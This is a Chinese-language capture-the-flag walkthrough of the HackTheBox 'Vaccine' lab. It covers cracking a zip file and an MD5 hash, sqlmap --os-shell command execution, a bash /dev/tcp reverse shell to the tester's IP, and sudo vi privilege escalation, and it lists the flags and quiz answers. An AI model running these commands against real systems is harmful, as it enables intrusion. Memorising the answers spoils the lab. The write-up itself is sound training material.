HTB-Vaccine(suid提权、sqlmap、john2zip)

前言

  • 各位师傅大家好,我是qmx_07,今天来为大家讲解Vaccine靶机
    在这里插入图片描述

渗透过程

信息搜集

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  • 服务器开放了 21FTP服务、22SSH服务、80HTTP服务

通过匿名登录FTP服务器

在这里插入图片描述

  • 通过匿名登录到服务器,发现backup.zip文件,可能存在账号密码
    在这里插入图片描述
  • 发现backup.zip文件 设置密码,考虑使用john 破解

john 破解zip文件

在这里插入图片描述

  • zip2john 是一个用于处理加密 ZIP 文件以进行密码破解的工具
  • 可以将加密的 ZIP 文件转换为一种特定的格式,以便密码破解工具(如 John the Ripper)能够识别和处理。
  • 文件后缀为 “.hashes” 通常表示该文件包含密码哈希值
  • 通过对密码进行特定的算法运算得到的结果,其目的是为了在不直接存储明文密码的情况下,能够验证用户输入的密码是否正确
    在这里插入图片描述
    密码是:741852963

哈希破解

在这里插入图片描述

  • 可以看到 网站的账户是:admin
  • 密码经过md5加密:2cb42f8734ea607eefed3b70af13bbd3

我们介绍一下密码破解网站:crackstation.net

  • 支持多种哈希算法:LM、NTLM、MD2、MD4、MD5、SHA1、SHA224、SHA256、SHA384、SHA512、RIPEMD160 ,速度非常快
    在这里插入图片描述
  • 密码是:qwerty789

sqlmap 利用- os-shell 获取权限

在这里插入图片描述

  • 登录网站之后,发现搜索框 查询内容,疑似sql注入
    在这里插入图片描述
  • 输入’ 有错误回显,确认确实具有该漏洞
    在这里插入图片描述
  • SQLMap 是一款开源的自动化 SQL 注入工具,主要用于检测和利用 SQL 注入漏洞
  • 可以对多种数据库进行漏洞探测:MySQL、Oracle、PostgreSQL、Microsoft SQL Server
    常用命令:
-u:指定目标 URL
例子:sqlmap -u "http://example.com/page.php?id=1"
--dbs:列出目标数据库中的所有数据库
例子:sqlmap -u "http://example.com/page.php?id=1" --dbs
--tables:列出指定数据库中的所有表
例子:sqlmap -u "http://example.com/page.php?id=1" --tables -D database_name
--columns:列出指定表中的所有列
例子:sqlmap -u "http://example.com/page.php?id=1" --columns -D database_name -T table_name
-os-shell 用于获取目标服务器的操作系统命令行 shell
例子:sqlmap -u "http://example.com/page.php?id=1" --os-shell

在这里插入图片描述

  • 通过yakit 捕获cookie内容,因为sql注入的地方 是后台,需要登录信息
  • Cookie: PHPSESSID=3mmtugeeqob4aplgtdomrie2gf
    在这里插入图片描述
sqlmap -u "http://10.129.104.85/dashboard.php?search=nothing" --cookie="PHPSESSID=3mmtugeeqob4aplgtdomrie2gf" --os-shell

在这里插入图片描述

  • 可以执行命令 来反弹会话
bash -c "bash -i >& /dev/tcp/10.10.16.3/1234 0>&1"

在这里插入图片描述
通过一下命令,来巩固会话:

python3 -c 'import pty; pty.spawn("/bin/bash")'

suid提权

在这里插入图片描述

在这里插入图片描述

  • 翻找网站连接配置文件dashboard.php

  • 用户是:postgres

  • 密码是:P@s5w0rd!
    在这里插入图片描述

  • 命令:su postgres //登录账户

  • 可以观察到 postgres可以以root权限运行 vi命令 指向pg_hba.conf

  • https://gtfobins.github.io/ 这个网站提供了suid提权的相关命令
    在这里插入图片描述

sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:set shell=/bin/sh     :wq 保存退出
:shell                 回车

在这里插入图片描述
user_flag:ec9b13ca4d6229cd5cc1e09980965bf7

在这里插入图片描述
flag:dd6e058e814260bc70e9bbdef2715849

答案

  • 1.服务器上除了HTTP、SSH服务,还提供了哪些服务?

FTP

  • 2.可以使用哪个用户登录FTP服务器?

anonymous

  • 3.可以使用哪个命令下载文件?

get

  • 4.john the ripper可以使用哪个脚本来破解zip文件?

john2zip

  • 5.admin的密码是什么?

QWERTY789

  • 6.sqlmap可以使用什么参数来获得命令执行?

–os-shell

  • 7.postgres可以使用什么命令以root身份运行?

vi

  • 8.用户flag?

ec9b13ca4d6229cd5cc1e09980965bf7

  • 9.flag?

dd6e058e814260bc70e9bbdef2715849

总结

  • 我们介绍了john2zip脚本,sqlmap工具及常用参数,suid提权及相关辅助网站,哈希密码破解网站

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/427182.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

硬件工程师笔试面试——滤波器

目录 12、滤波器 12.1 基础 滤波器原理图 滤波器实物图 12.1.1 概念 12.1.2 滤波器的分类 12.1.3 滤波器的工作原理 12.1.4 滤波器的应用 12.1.5 滤波器设计的关键参数 12.2 相关问题 12.2.1 不同类型的滤波器在实际应用中的具体作用是什么? 12.2.2 如何设计一个简…

ABAP-Logger ABAP 日志记录与任何其他语言一样轻松

ABAP-Logger ABAP 日志记录与任何其他语言一样轻松 ABAP Logger SAP Logging as painless as any other language. ABAP Version: 702 or higher See the mission statement Features Record message in Application Log(BC-SRV-BAL)Display message Installation Insta…

记忆化搜索

目录 引言: 1. 什么是记忆化搜索? 2. 如何实现记忆化搜索? 一、斐波那契数 1. 题目链接:509. 斐波那契数 2. 题目描述: 3. 解法(暴搜 -> 记忆化搜索 -> 动态规划): &am…

【楚怡杯】职业院校技能大赛 “云计算应用” 赛项样题六

某企业根据自身业务需求,实施数字化转型,规划和建设数字化平台,平台聚焦“DevOps开发运维一体化”和“数据驱动产品开发”,拟采用开源OpenStack搭建企业内部私有云平台,开源Kubernetes搭建云原生服务平台,选…

涛思数据库安装和卸载

安装 cd opt/taos/TDengine-server-2.4.0.5 sudo ./install.sh 启动taos​ 安装后,请使用 systemctl 命令来启动 TDengine 的服务进程 systemctl start taosd检查服务是否正常工作: systemctl status taosd 升级 3.0 版在之前版本的基础上&#x…

使用 SpringBoot 基础web开发的支持

首先导入项目相关的依赖&#xff1a; pom.xml 文件&#xff1a; 导入相关项目依赖 <?xml version"1.0" encoding"UTF-8"?> <project xmlns"http://maven.apache.org/POM/4.0.0" xmlns:xsi"http://www.w3.org/2001/XMLSchema-in…

Git使用—把当前仓库的一个分支push到另一个仓库的指定分支、基于当前仓库创建另一个仓库的分支并推送到对应仓库(mit6828)

把学习过程中遇到的Git问题汇总如下&#xff08;后续学习遇到问题会及时更新此专栏&#xff09;&#xff1a; Git原理及常用命令小结——实用版&#xff08;ing......&#xff09;、Git设置用户名邮箱-CSDN博客 解决git每次push代码到github都需要输入用户名以及密码-CSDN博客…

硬件工程师笔试面试——变压器

目录 9、变压器 9.1 基础 变压器原理图 变压器实物图 9.1.1 概念 9.1.2 变压器组成结构 9.1.3 变压器原理 9.1.4 变压器的类型 9.1.5 应用领域 9.2 相关问题 9.2.1 变压器的工作原理是什么? 9.2.2 如何选择合适的变压器类型? 9.2.3 变压器在实际应用中,如何进行…

9.18 C++对C的扩充

使用cout实现输出斐波那契前20项的值 #include <iostream>using namespace std;int main() {int n11,n21,n3;cout << n1 <<" "<< n2<<" ";for(int i0;i<18;i){n3n1n2;cout<<n3<<" " ;n1n2;n2n3;}…

算法备案究竟是自己做还是找专业机构?

算法备案究竟是自己做还是找专业机构&#xff1f; 在深入了解算法备案申报要求和规则的基础上&#xff0c;企业可以选择自行完成备案。然而&#xff0c;如果缺乏相关知识和经验&#xff0c;申报材料可能会反复出错&#xff0c;导致被驳回&#xff0c;增加试错的时间成本&#x…

前端开发之原型模式

介绍 原型模式本质就是借用一个已有的实例做原型&#xff0c;在这原型基础上快速复制出一个和原型一样的一个对象。 class CloneDemo {name clone democlone(): CloneDemo {return new CloneDemo()} } 原型原型链 函数&#xff08;class&#xff09;都有显示原型 prototyp…

录音翻译成文字的软件有哪些?试试这5款工具,一键识别

将录音翻译成文字的需求日益增长&#xff0c;无论是商务会议、学术讲座还是日常生活&#xff0c;一款高效、准确的录音翻译软件都能极大地提升我们的工作与生活效率。今天&#xff0c;我们就来盘点5款备受好评的录音翻译成文字的软件&#xff0c;一起来了解下吧。 工具一&#…

【云原生监控】Prometheus之PushGateway

Prometheus之PushGateway 文章目录 Prometheus之PushGateway介绍作用资源列表基础环境一、部署PushGateway1.1、下载软件包1.2、解压软件包1.3、编辑配置systemctl启动文件1.4、创建日志目录1.5、加载并启动1.6、监控端口1.7、访问PushGateway 二、 配置Prometheus抓取PushGate…

git push失败原因上传的文件超过了Gitee的上限100M

! [remote rejected] master -> master (pre-receive hook declined) error: failed to push some refs to 这个错误信息表明你在尝试将更改推送到Gitee的socket_service仓库时遇到了问题。具体来说&#xff0c;问题出在你尝试推送的文件大小超过了Gitee平台设定的限制。Git…

ES6标准---【八】【学习ES6看这一篇就够了!!!】

目录 前言 export命令 输出变量 输出函数/类 export中的as别名 export必须一一对应 export接口的响应性 注意 import命令 import命令的语法 import命令里的as别名 import的只读性 import命令具有提升性 import的一些约定 import的静态执行 import的唯一执行性 模…

前端常见面试-首页性能提升、项目优化

首页性能提升 Vue 首页性能提升是Vue应用开发中非常重要的一环&#xff0c;它直接影响用户体验和应用的加载速度。以下是一些关键的Vue首页性能提升策略&#xff1a; 1. 代码分割与懒加载 路由懒加载&#xff1a;利用Webpack的动态导入&#xff08;import()&#xff09;特性…

36.贪心算法3

1.坏了的计算器&#xff08;medium&#xff09; . - 力扣&#xff08;LeetCode&#xff09; 题目解析 算法原理 代码 class Solution {public int brokenCalc(int startValue, int target) {// 正难则反 贪⼼int ret 0;while (target > startValue) {if (target % 2 0…

在Word中,用VBA比较两段文本的相似度

效果1: 去掉字符串中回车&#xff0c;进行改进后效果&#xff1a; 代码&#xff1a; Function LevenshteinDistance(s As String, t As String) As IntegerDim d() As IntegerDim i As IntegerDim j As IntegerDim cost As IntegerDim sLen As IntegerDim tLen As IntegersLen…

【CSS in Depth 2 精译_034】5.4 Grid 网格布局的显示网格与隐式网格(下)

当前内容所在位置&#xff08;可进入专栏查看其他译好的章节内容&#xff09; 第一章 层叠、优先级与继承&#xff08;已完结&#xff09; 1.1 层叠1.2 继承1.3 特殊值1.4 简写属性1.5 CSS 渐进式增强技术1.6 本章小结 第二章 相对单位&#xff08;已完结&#xff09; 2.1 相对…

【网络通信基础与实践第二讲】包括互联网概述、互联网发展的三个阶段、互联网的组成、计算机网络的体系结构

一、互联网概述 计算机网络是由若干节点&#xff08;node&#xff09;和连接这些节点的链路&#xff08;link&#xff09;组成。 网络之间还可以通过路由器互联起来&#xff0c;这就构成了一个覆盖范围更大的计算机网络。这样的网络称为互联网。 网络把许多计算机连接在一起…